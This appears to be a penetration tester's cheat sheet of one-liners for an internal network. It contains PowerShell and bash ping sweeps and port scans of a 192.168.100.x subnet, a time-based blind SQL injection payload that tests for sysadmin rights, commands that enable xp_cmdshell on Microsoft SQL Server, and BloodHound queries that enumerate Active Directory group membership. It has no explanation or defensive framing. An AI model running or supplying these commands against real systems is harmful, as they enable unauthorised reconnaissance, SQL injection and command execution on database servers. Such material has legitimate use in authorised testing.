powershell -Command "1..254 | % { $ip = \"192.168.100.$_\"; if (Test-Connection -Count 1 -Quiet -ComputerName $ip) { Write-Output \"$ip is alive\" } }"

for ip in $(seq 200 254); do ping -c 1 -W 1 192.168.100.$ip &> /dev/null && echo "192.168.100.$ip is up"; done 

powershell -Command "$ip='192.168.100.x'; $ports='445','80','443'; foreach ($port in $ports) { if (Test-NetConnection -ComputerName $ip -Port $port -InformationLevel Quiet) { Write-Output \"{$ip}:{$port} is OPEN\" } else { Write-Output \"{$ip}:{$port} is CLOSED\" } }"

powershell -Command '$ip="192.168.100.x"; $ports="445","80","443"; foreach ($port in $ports) { if (Test-NetConnection -ComputerName $ip -Port $port -InformationLevel Quiet) { Write-Output "$ip`:$port is OPEN" } else { Write-Output "$ip`:$port is CLOSED" } }'

for port in 22 80 443; do 
  (echo > /dev/tcp/192.168.100.x/$port) >/dev/null 2>&1 && echo "Port $port is open"
done

IF (SELECT is_srvrolemember('sysadmin')) IS NOT NULL waitfor delay '0:0:10'--

MATCH (u:User)-[:MemberOf]->(g:Group)
RETURN g.name AS GroupName, collect(u.name) AS Users
ORDER BY g.name

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

MATCH (u:User {name: "USERNAME@DOMAIN.LOCAL"})-[:MemberOf]->(g:Group)
RETURN g.name AS GroupName

MATCH (u:User)
WHERE toLower(u.name) CONTAINS "user1"
RETURN u.name
